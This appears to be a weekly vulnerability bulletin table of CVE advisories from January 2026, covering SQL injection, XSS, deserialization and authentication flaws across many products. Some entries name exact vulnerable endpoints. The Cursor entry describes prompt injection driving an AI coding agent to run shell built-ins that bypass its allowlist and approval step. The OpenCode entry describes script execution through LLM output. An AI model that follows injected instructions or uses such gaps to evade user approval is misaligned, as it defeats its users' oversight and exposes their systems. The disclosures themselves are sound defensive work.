| AbhishekMali21--AbhishekMali21 | Multiple SQL Injection vulnerabilities exist in AbhishekMali21 GYM-MANAGEMENT-SYSTEM 1.0 via the 'name' parameter in (1) member_search.php, (2) trainer_search.php, and (3) gym_search.php, and via the 'id' parameter in (4) payment_search.php. An unauthenticated remote attacker can exploit these issues to inject malicious SQL commands, leading to unauthorized data extraction, authentication bypass, or modification of database contents. | 2026-01-12 | not yet calculated | CVE-2025-67146 | https://github.com/AbhishekMali21/GYM-MANAGEMENT-SYSTEM/issues/4 |
| AbhishekMali21--AbhishekMali21 | Multiple SQL Injection vulnerabilities exist in amansuryawanshi Gym-Management-System-PHP 1.0 via the 'name', 'email', and 'comment' parameters in (1) submit_contact.php, the 'username' and 'pass_key' parameters in (2) secure_login.php, and the 'login_id', 'pwfield', and 'login_key' parameters in (3) change_s_pwd.php. An unauthenticated or authenticated attacker can exploit these issues to bypass authentication, execute arbitrary SQL commands, modify database records, delete data, or escalate privileges to administrator level. | 2026-01-12 | not yet calculated | CVE-2025-67147 | https://github.com/amansuryawanshi/Gym-Management-System-PHP/issues/3 |
| Absolute Security--Secure Access | CVE-2026-0517 is a denial-of-service vulnerability in versions of Secure Access Server prior to 14.20. An attacker can send a specially crafted packet to a server and cause the server to crash | 2026-01-17 | not yet calculated | CVE-2026-0517 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0517 |
| Absolute Security--Secure Access | CVE-2026-0518 is a cross-site scripting vulnerability in versions of Secure Access prior to 14.20. An attacker with administrative privileges can interfere with another administrator's use of the console. | 2026-01-17 | not yet calculated | CVE-2026-0518 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0518 |
| Absolute Security--Secure Access | In Secure Access 12.70 and prior to 14.20, the logging subsystem may write an unredacted authentication token to logs under certain configurations. Any party with access to those logs could read the token and reuse it to access an integrated system. | 2026-01-17 | not yet calculated | CVE-2026-0519 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0519 |
| Acora--Acora | A static password reset token in the password reset function of DDSN Interactive Acora CMS v10.7.1 allows attackers to arbitrarily reset the user password and execute a full account takeover via a replay attack. | 2026-01-12 | not yet calculated | CVE-2025-63314 | http://ddsn.com http://acora.com https://github.com/padayali-JD/CVE-2025-63314 |
| adonisjs--lucid | @adonisjs/lucid is an SQL ORM for AdonisJS built on top of Knex. Prior to 21.8.2 and 22.0.0-next.6, there is a Mass Assignment vulnerability in AdonisJS Lucid which may allow a remote attacker who can influence data that is passed into Lucid model assignments to overwrite the internal ORM state. This may lead to logic bypasses and unauthorized record modification within a table or model. This affects @adonisjs/lucid through version 21.8.1 and 22.x pre-release versions prior to 22.0.0-next.6. This has been patched in @adonisjs/lucid versions 21.8.2 and 22.0.0-next.6. | 2026-01-13 | not yet calculated | CVE-2026-22814 | https://github.com/adonisjs/lucid/security/advisories/GHSA-g5gc-h5hp-555f |
| Airth--Airth | An issue in AIRTH SMART HOME AQI MONITOR Bootloader v.1.005 allows a physically proximate attacker to obtain sensitive information via the UART port of the BK7231N controller (Wi-Fi and BLE module) on the device is open to access | 2026-01-14 | not yet calculated | CVE-2025-67399 | http://airth.com https://github.com/rupeshsurve04/CVE-2025-67399/blob/main/AIRTH_SMART_HOME_AQI_MONITOR_CVE-2025-67399.pdf |
| akinloluwami--outray | Outray openSource ngrok alternative. Prior to 0.1.5, a TOCTOU race condition vulnerability allows a user to exceed the set number of active tunnels in their subscription plan. This vulnerability is fixed in 0.1.5. | 2026-01-14 | not yet calculated | CVE-2026-22820 | https://github.com/outray-tunnel/outray/security/advisories/GHSA-3pqc-836w-jgr7 https://github.com/outray-tunnel/outray/commit/08c61495761349e7fd2965229c3faa8d7b1c1581 |
| alextselegidis--easyappointments | Easy!Appointments is a self hosted appointment scheduler. In 1.5.2 and earlier, application/core/EA_Security.php::csrf_verify() only enforces CSRF for POST requests and returns early for non-POST methods. Several application endpoints perform state-changing operations while accepting parameters from GET (or $_REQUEST), so an attacker can perform CSRF by forcing a victim's browser to issue a crafted GET request. Impact: creation of admin accounts, modification of admin email/password, and full admin account takeover. | 2026-01-15 | not yet calculated | CVE-2026-23622 | https://github.com/alextselegidis/easyappointments/security/advisories/GHSA-54v4-4685-vwrj |
| AltumCode--AltumCode | Cross Site Scripting vulnerability in 66biolinks by AltumCode v.61.0.1 allows an attacker to execute arbitrary code via a crafted favicon file | 2026-01-12 | not yet calculated | CVE-2025-66939 | https://66biolinks.com/ https://gist.github.com/Waqar-Arain/2a21b135a04e7804c124688ea1085875 |
| AMD--AMD EPYC 9004 Series Processors | Write what were condition within AMD CPUs may allow an admin-privileged attacker to modify the configuration of the CPU pipeline potentially resulting in the corruption of the stack pointer inside an SEV-SNP guest. | 2026-01-16 | not yet calculated | CVE-2025-29943 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3027.html |
| anomalyco--opencode | OpenCode is an open source AI coding agent. The markdown renderer used for LLM responses will insert arbitrary HTML into the DOM. There is no sanitization with DOMPurify or even a CSP on the web interface to prevent JavaScript execution via HTML injection. This means controlling the LLM response for a chat session gets JavaScript execution on the http://localhost:4096 origin. This vulnerability is fixed in 1.1.10. | 2026-01-12 | not yet calculated | CVE-2026-22813 | https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp |
| Anycomment--Anycomment | Cross Site Scripting vulnerability in Anycomment anycomment.io 0.4.4 allows a remote attacker to execute arbitrary code via the Anycomment comment section | 2026-01-15 | not yet calculated | CVE-2025-67025 | https://bdu.fstec.ru/vul/2023-08900 https://anycomment.io/site/changelog |
| Apache Software Foundation--Apache Airflow | In Apache Airflow versions before 3.1.6, when rendered template fields in a Dag exceed [core] max_templated_field_length, sensitive values could be exposed in cleartext in the Rendered Templates UI. This occurred because serialization of those fields used a secrets masker instance that did not include user-registered mask_secret() patterns, so secrets were not reliably masked before truncation and display. Users are recommended to upgrade to 3.1.6 or later, which fixes this issue | 2026-01-16 | not yet calculated | CVE-2025-68438 | https://lists.apache.org/thread/55n7b4nlsz3vo5n4h5lrj9bfsk8ctyff |
| Apache Software Foundation--Apache Airflow | In Apache Airflow versions before 3.1.6, the proxies and proxy fields within a Connection may include proxy URLs containing embedded authentication information. These fields were not treated as sensitive by default and therefore were not automatically masked in log output. As a result, when such connections are rendered or printed to logs, proxy credentials embedded in these fields could be exposed. Users are recommended to upgrade to 3.1.6 or later, which fixes this issue | 2026-01-16 | not yet calculated | CVE-2025-68675 | https://lists.apache.org/thread/x6kply4nqd4vc4wgxtm6g9r2tt63s8c5 |
| Apache Software Foundation--Apache bRPC | Remote command injection vulnerability in heap profiler builtin service in Apache bRPC ((all versions < 1.15.0)) on all platforms allows attacker to inject remote command. Root Cause: The bRPC heap profiler built-in service (/pprof/heap) does not validate the user-provided extra_options parameter and executes it as a command-line argument. Attackers can execute remote commands using the extra_options parameter.. Affected scenarios: Use the built-in bRPC heap profiler service to perform jemalloc memory profiling. How to Fix: we provide two methods, you can choose one of them: 1. Upgrade bRPC to version 1.15.0. 2. Apply this patch ( https://github.com/apache/brpc/pull/3101 ) manually. | 2026-01-16 | not yet calculated | CVE-2025-60021 | https://lists.apache.org/thread/xy51d2fx6drzhfp92xptsx5845q7b37m |
| Apache Software Foundation--Apache Camel Neo4j | Cypher Injection vulnerability in Apache Camel camel-neo4j component. This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0 Users are recommended to upgrade to version 4.10.8 for 4.10.x LTS and 4.14.3 for 4.14.x LTS and 4.17.0. | 2026-01-14 | not yet calculated | CVE-2025-66169 | https://camel.apache.org/security/CVE-2025-66169.html |
| Apple--iOS and iPadOS | The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.1 and iPadOS 18.1. An app may be able to corrupt coprocessor memory. | 2026-01-16 | not yet calculated | CVE-2024-44238 | https://support.apple.com/en-us/121563 |
| Apple--iOS and iPadOS | This issue was addressed through improved state management. This issue is fixed in iOS 18.1 and iPadOS 18.1. A user may be able to view restricted content from the lock screen. | 2026-01-16 | not yet calculated | CVE-2024-54556 | https://support.apple.com/en-us/121563 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 18.3 and iPadOS 18.3. An app may be able to enumerate a user's installed apps. | 2026-01-16 | not yet calculated | CVE-2025-24089 | https://support.apple.com/en-us/122066 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 18.3 and iPadOS 18.3. An app may be able to enumerate a user's installed apps. | 2026-01-16 | not yet calculated | CVE-2025-24090 | https://support.apple.com/en-us/122066 |
| Apple--macOS | This issue was addressed with improved permissions checking. This issue is fixed in macOS Sequoia 15.1. An app may be able to access user-sensitive data. | 2026-01-16 | not yet calculated | CVE-2024-44210 | https://support.apple.com/en-us/121564 |
| Apple--macOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2026-01-16 | not yet calculated | CVE-2025-43508 | https://support.apple.com/en-us/125634 |
| Apple--Xcode | A permissions issue was addressed with additional restrictions. This issue is fixed in Xcode 16.3. An app may be able to bypass Privacy preferences. | 2026-01-16 | not yet calculated | CVE-2025-31186 | https://support.apple.com/en-us/122380 |
| Arm--Neoverse-N2 | In certain Arm CPUs, a CPP RCTX instruction executed on one Processing Element (PE) may inhibit TLB invalidation when a TLBI is issued to the PE, either by the same PE or another PE in the shareability domain. In this case, the PE may retain stale TLB entries which should have been invalidated by the TLBI. | 2026-01-14 | not yet calculated | CVE-2025-0647 | https://developer.arm.com/documentation/111546 |
| Assaf Parag--Poll, Survey & Quiz Maker Plugin by Opinion Stage | Poll, Survey & Quiz Maker Plugin by Opinion Stage Wordpress plugin versions prior to 19.6.25 contain a stored cross-site scripting (XSS) vulnerability via multiple parameters due to insufficient input validation and output escaping. An unauthenticated attacker can inject arbitrary script into content that executes when a victim views an affected page. | 2026-01-16 | not yet calculated | CVE-2019-25297 | https://wpscan.com/vulnerability/4ed1edd6-3813-44a3-bee7-f07c1774b679/ https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-polls-by-opinionstage/poll-survey-quiz-maker-plugin-by-opinion-stage-19625-unauthenticated-stored-cross-site-scripting https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-poll-survey-form-quiz-maker-by-opinionstage-cross-site-scripting-19-6-24/ https://wordpress.org/plugins/social-polls-by-opinionstage/ https://plugins.trac.wordpress.org/changeset/2158590/social-polls-by-opinionstage https://web.archive.org/web/20191020011448/https://www.pluginvulnerabilities.com/2019/09/16/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-poll-survey-form-quiz-maker-by-opinionstage/ https://www.vulncheck.com/advisories/poll-survey-and-quiz-maker-plugin-by-opinion-stage-stored-xss |
| Automai--Automai | An issue in Automai Director v.25.2.0 allows a remote attacker to escalate privileges | 2026-01-12 | not yet calculated | CVE-2025-46066 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/4e325d09d08e16efb506076da2184f42 |
| Automai--Automai | An issue in Automai Director v.25.2.0 allows a remote attacker to escalate privileges and obtain sensitive information via a crafted js file | 2026-01-12 | not yet calculated | CVE-2025-46067 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/98204cff0065e611cf9e9acc3be59e03 |
| Automai--Automai | An issue in Automai Director v.25.2.0 allows a remote attacker to execute arbitrary code via the update mechanism | 2026-01-12 | not yet calculated | CVE-2025-46068 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/00ea6cce1299e1d999b5d1faac4248f1 |
| Automai--Automai | An issue in Automai BotManager v.25.2.0 allows a remote attacker to execute arbitrary code via the BotManager.exe component | 2026-01-12 | not yet calculated | CVE-2025-46070 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/776dd7e927d9b2f8ef10807abe124f8e |
| bee interactive--Livewire Filemanager | Livewire Filemanager, commonly used in Laravel applications, contains LivewireFilemanagerComponent.php, which does not perform file type and MIME validation, allowing for RCE through upload of a malicious php file that can then be executed via the /storage/ URL if a commonly performed setup process within Laravel applications has been completed. | 2026-01-16 | not yet calculated | CVE-2025-14894 | https://github.com/livewire-filemanager/filemanager https://hackingbydoing.wixsite.com/hackingbydoing/post/unauthenticated-rce-in-livewire-filemanager |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX backend APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable APIs. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform. | 2026-01-14 | not yet calculated | CVE-2026-22236 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to the exposure of sensitive internal API documentation. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the APIs exposed by the documentation. Successful exploitation of this vulnerability could allow the attacker to cause damage to the targeted platform by abusing internal functionality. | 2026-01-14 | not yet calculated | CVE-2026-22237 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX admin APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable admin API to create a new user with admin privileges. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform by logging in to the newly-created admin user. | 2026-01-14 | not yet calculated | CVE-2026-22238 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to design flaws in the email sending API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable email sending API. Successful exploitation of this vulnerability could allow the attacker to send unsolicited emails to anyone on behalf of the company. | 2026-01-14 | not yet calculated | CVE-2026-22239 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to an improper password storage implementation and subsequent exposure via unauthenticated APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable users API to retrieve the plaintext passwords of all user users. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform by logging in using an exposed admin email address and password. | 2026-01-14 | not yet calculated | CVE-2026-22240 | https://blusparkglobal.com/bluvoyix/ |
| Broadcom--DX NetOps Spectrum | Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Path Traversal.This issue affects DX NetOps Spectrum: 24.3.8 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69267 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Reflected XSS.This issue affects DX NetOps Spectrum: 24.3.8 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69268 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows OS Command Injection.This issue affects DX NetOps Spectrum: 23.3.6 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69269 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Information Exposure Through Query Strings in GET Request vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Session Hijacking.This issue affects DX NetOps Spectrum: 24.3.8 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69270 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Insufficiently Protected Credentials vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Sniffing Attacks.This issue affects DX NetOps Spectrum: 24.3.13 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69271 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Cleartext Transmission of Sensitive Information vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Sniffing Attacks.This issue affects DX NetOps Spectrum: 21.2.1 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69272 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Improper Authentication vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Authentication Bypass.This issue affects DX NetOps Spectrum: 24.3.10 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69273 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Authorization Bypass Through User-Controlled Key vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Privilege Escalation.This issue affects DX NetOps Spectrum: 24.3.10 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69274 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Dependency on Vulnerable Third-Party Component vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows DOM-Based XSS.This issue affects DX NetOps Spectrum: 24.3.9 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69275 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Deserialization of Untrusted Data vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Object Injection.This issue affects DX NetOps Spectrum: 24.3.13 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69276 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| calcom--cal.com | Cal.com is open-source scheduling software. From 3.1.6 to before 6.0.7, there is a vulnerability in a custom NextAuth JWT callback that allows attackers to gain full authenticated access to any user's account by supplying a target email address via session.update(). This vulnerability is fixed in 6.0.7. | 2026-01-13 | not yet calculated | CVE-2026-23478 | https://github.com/calcom/cal.com/security/advisories/GHSA-7hg4-x4pr-3hrg |
| Chainlit--Chainlit | Chainlit versions prior to 2.8.5 contain an authorization bypass through user-controlled key vulnerability. If this vulnerability is exploited, threads may be viewed or thread ownership may be obtained by an attacker who can log in to the product. | 2026-01-14 | not yet calculated | CVE-2025-68492 | https://github.com/Chainlit/chainlit/releases https://jvn.jp/en/jp/JVN34964581/ |
| Chamillo--Chamillo | An issue was discovered in Chamillo LMS 1.11.2. The Social Network /personal_data endpoint exposes full sensitive user information even after logout because proper cache-control is missing. Using the browser back button restores all personal data, allowing unauthorized users on the same device to view confidential information. This leads to profiling, impersonation, targeted attacks, and significant privacy risks. | 2026-01-16 | not yet calculated | CVE-2025-69581 | https://github.com/chamilo/chamilo-lms https://github.com/Rivek619/CVE-2025-69581 |
| Changjetong Information Technology Co., Ltd.--T+ | Changjetong T+ versions up to and including 16.x contain a .NET deserialization vulnerability in an AjaxPro endpoint that can lead to remote code execution. A remote attacker can send a crafted request to /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore with a malicious JSON body that leverages deserialization of attacker-controlled .NET types to invoke arbitrary methods such as System.Diagnostics.Process.Start. This can result in execution of arbitrary commands in the context of the T+ application service account. Exploitation evidence was observed by the Shadowserver Foundation on 2023-08-19 (UTC). | 2026-01-15 | not yet calculated | CVE-2023-7334 | https://www.chanjetvip.com/product/goods/detail?id=6077e91b70fa071069139f62 https://www.freebuf.com/articles/web/381731.html https://blog.csdn.net/qq_53003652/article/details/134031230 https://blog.csdn.net/u010025272/article/details/131553591 https://github.com/MD-SEC/MDPOCS/blob/main/ChangJieTongTPlus_GetStoreWarehouseByStore_Rce_Poc.py https://www.vulncheck.com/advisories/changjetong-tplus-getstorewarehousebystore-deserialization-rce |
| cursor--cursor | Cursor is a code editor built for programming with AI. Prior to 2.3, hen the Cursor Agent is running in Auto-Run Mode with Allowlist mode enabled, certain shell built-ins can still be executed without appearing in the allowlist and without requiring user approval. This allows an attacker via indirect or direct prompt injection to poison the shell environment by setting, modifying, or removing environment variables that influence trusted commands. This vulnerability is fixed in 2.3. | 2026-01-14 | not yet calculated | CVE-2026-22708 | https://github.com/cursor/cursor/security/advisories/GHSA-82wg-qcm4-fp2w |
| Cyber Cafe--Cyber Cafe | A stored cross-site scripting (XSS) vulnerability exists in Cyber Cafe Management System v1.0. An authenticated attacker can inject arbitrary JavaScript code into the username parameter via the add-users.php endpoint. The injected payload is stored and executed in the victim s browser when the affected page is accessed. | 2026-01-15 | not yet calculated | CVE-2025-70890 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70890 |
| Cyber Cafe--Cyber Cafe | A stored cross-site scripting (XSS) vulnerability exists in Phpgurukul Cyber Cafe Management System v1.0 within the user management module. The application does not properly sanitize or encode user-supplied input submitted via the uadd parameter in the add-users.php endpoint. An authenticated attacker can inject arbitrary JavaScript code that is persistently stored in the database. The malicious payload is triggered when a privileged user clicks the View button on the view-allusers.php page. | 2026-01-15 | not yet calculated | CVE-2025-70891 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70891 |
| Cyber Cafe--Cyber Cafe | Phpgurukul Cyber Cafe Management System v1.0 contains a SQL Injection vulnerability in the user management module. The application fails to properly validate user-supplied input in the username parameter of the add-users.php endpoint. | 2026-01-15 | not yet calculated | CVE-2025-70892 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70892 |
| Cyber Cafe--Cyber Cafe | A time-based blind SQL Injection vulnerability exists in PHPGurukul Cyber Cafe Management System v1.0 within the adminprofile.php endpoint. The application fails to properly sanitize user-supplied input provided via the adminname parameter, allowing authenticated attackers to inject arbitrary SQL expressions. | 2026-01-15 | not yet calculated | CVE-2025-70893 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70893 |
| dask--distributed | Dask distributed is a distributed task scheduler for Dask. Prior to 2026.1.0, when Jupyter Lab, jupyter-server-proxy, and Dask distributed are all run together, it is possible to craft a URL which will result in code being executed by Jupyter due to a cross-side-scripting (XSS) bug in the Dask dashboard. It is possible for attackers to craft a phishing URL that assumes Jupyter Lab and Dask may be running on localhost and using default ports. If a user clicks on the malicious link it will open an error page in the Dask Dashboard via the Jupyter Lab proxy which will cause code to be executed by the default Jupyter Python kernel. This vulnerability is fixed in 2026.1.0. | 2026-01-16 | not yet calculated | CVE-2026-23528 | https://github.com/dask/distributed/security/advisories/GHSA-c336-7962-wfj2 https://github.com/dask/distributed/commit/ab72092a8a938923c2bb51a2cd14ca26614827fa |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, GuardDog's safe_extract() function does not validate decompressed file sizes when extracting ZIP archives (wheels, eggs), allowing attackers to cause denial of service through zip bombs. A malicious package can consume gigabytes of disk space from a few megabytes of compressed data. This vulnerability is fixed in 2.7.1. | 2026-01-13 | not yet calculated | CVE-2026-22870 | https://github.com/DataDog/guarddog/security/advisories/GHSA-ffj4-jq7m-9g6v https://github.com/DataDog/guarddog/commit/c3fb07b4838945f42497e78b7a02bcfb1e63969b |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, there is a path traversal vulnerability exists in GuardDog's safe_extract() function that allows malicious PyPI packages to write arbitrary files outside the intended extraction directory, leading to Arbitrary File Overwrite and Remote Code Execution on systems running GuardDog. This vulnerability is fixed in 2.7.1. | 2026-01-13 | not yet calculated | CVE-2026-22871 | https://github.com/DataDog/guarddog/security/advisories/GHSA-xg9w-vg3g-6m68 https://github.com/DataDog/guarddog/commit/9aa6a725b2c71d537d3c18d1c15621395ebb879c |
| defenseunicorns--pepr | Pepr is a type safe K8s middleware. Prior to 1.0.5 , Pepr defaults to a cluster-admin RBAC configuration and does not explicitly force or enforce least-privilege guidance for module authors. The default behavior exists to make the "getting started" experience smooth: new users can experiment with Pepr and create resources dynamically without needing to pre-configure RBAC. This vulnerability is fixed in 1.0.5. | 2026-01-16 | not yet calculated | CVE-2026-23634 | https://github.com/defenseunicorns/pepr/security/advisories/GHSA-w54x-r83c-x79q https://github.com/defenseunicorns/pepr/releases/tag/v1.0.5 |
| denoland--deno | Deno is a JavaScript, TypeScript, and WebAssembly runtime. Before 2.6.0, node:crypto doesn't finalize cipher. The vulnerability allows an attacker to have infinite encryptions. This can lead to naive attempts at brute forcing, as well as more refined attacks with the goal to learn the server secrets. This vulnerability is fixed in 2.6.0. | 2026-01-15 | not yet calculated | CVE-2026-22863 | https://github.com/denoland/deno/security/advisories/GHSA-5379-f5hf-w38v https://github.com/denoland/deno/releases/tag/v2.6.0 |
| Drupal--Facebook Pixel | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Drupal Facebook Pixel facebook_pixel allows Stored XSS.This issue affects Facebook Pixel: from 7.X-1.0 through 7.X-1.1. | 2026-01-14 | not yet calculated | CVE-2025-14557 | https://www.herodevs.com/vulnerability-directory/cve-2025-14557 https://d7es.tag1.com/security-advisories/facebook-pixel-less-critical-cross-site-scripting |
| Drupal--Flag | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Drupal Flag allows Cross-Site Scripting (XSS).This issue affects Flag: from 7.X-3.0 through 7.X-3.9. | 2026-01-14 | not yet calculated | CVE-2025-14556 | https://www.herodevs.com/vulnerability-directory/cve-2025-14556 https://d7es.tag1.com/security-advisories/flag-moderately-critical-cross-site-scripting-backdrop-sa-contrib-2025-011 |
| Eclipse Vert.x--Eclipse Vert.x | The Vert.x Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URI. The issue comes from an improper implementation of the C. rule of section 5.2.4 of RFC3986 and is fixed in Vert.x Core component (used by Vert.x Web): https://github.com/eclipse-vertx/vert.x/pull/5895 Steps to reproduce Given a file served by the static handler, craft an URI that introduces a string like bar%2F..%2F after the last / char to deny the access to the URI with an HTTP 404 response. For example https://example.com/foo/index.html can be denied with https://example.com/foo/bar%2F..%2Findex.html Mitgation Disabling Static Handler cache fixes the issue. StaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false); | 2026-01-15 | not yet calculated | CVE-2026-1002 | https://github.com/eclipse-vertx/vert.x/pull/5895 |
| eigent-ai--eigent | Eigent is a multi-agent Workforce. A critical security vulnerability in the CI workflow (.github/workflows/ci.yml) allows arbitrary code execution from fork pull requests with repository write permissions. The vulnerable workflow uses pull_request_target trigger combined with checkout of untrusted PR code. An attacker can exploit this to steal credentials, post comments, push code, or create releases. | 2026-01-13 | not yet calculated | CVE-2026-22869 | https://github.com/eigent-ai/eigent/security/advisories/GHSA-gvh4-93cq-5xxp https://github.com/eigent-ai/eigent/pull/836 https://github.com/eigent-ai/eigent/pull/837 https://github.com/eigent-ai/eigent/commit/bf02500bbbab0f01cd0ed8e6dc21fe5683d6bfb5 |
| eKoopmans--html2pdf.js | html2pdf.js converts any webpage or element into a printable PDF entirely client-side. Prior to 0.14.0, html2pdf.js contains a cross-site scripting (XSS) vulnerability when given a text source rather than an element. This text is not sufficiently sanitized before being attached to the DOM, allowing malicious scripts to be run on the client browser and risking the confidentiality, integrity, and availability of the page's data. This vulnerability has been fixed in html2pdf.js@0.14.0. | 2026-01-14 | not yet calculated | CVE-2026-22787 | https://github.com/eKoopmans/html2pdf.js/security/advisories/GHSA-w8x4-x68c-m6fc https://github.com/eKoopmans/html2pdf.js/issues/865 https://github.com/eKoopmans/html2pdf.js/pull/877 https://github.com/eKoopmans/html2pdf.js/commit/988826e336035b39a8608182d7b73c0e3cd78c7b https://github.com/eKoopmans/html2pdf.js/releases/tag/v0.14.0 |
| Emaintenance--Crazy Bubble Tea | In Crazy Bubble Tea mobile application authenticated attacker can obtain personal information about other users by enumerating a `loyaltyGuestId` parameter. Server does not verify the permissions required to obtain the data. This issue was fixed in version 915 (Android) and 7.4.1 (iOS). | 2026-01-14 | not yet calculated | CVE-2025-14317 | https://crazybubble.pl/aplikacja-crazy-bubble/ https://cert.pl/posts/2026/01/CVE-2025-14317 |
| emlog--emlog | Emlog is an open source website building system. emlog v2.6.1 and earlier exposes a REST API endpoint (/index.php?rest-api=upload) for media file uploads. The endpoint fails to implement proper validation of file types, extensions, and content, allowing authenticated attackers (with a valid API key or admin session cookie) to upload arbitrary files (including malicious PHP scripts) to the server. An attacker can obtain the API key either by gaining administrator access to enable the REST API setting, or via information disclosure vulnerabilities in the application. Once uploaded, the malicious PHP file can be executed to gain remote code execution (RCE) on the target server, leading to full server compromise. | 2026-01-12 | not yet calculated | CVE-2026-22799 | https://github.com/emlog/emlog/security/advisories/GHSA-p837-mrw9-5x5j https://github.com/emlog/emlog/commit/429b02fda842254b9b9b39303e9161999c180560 |
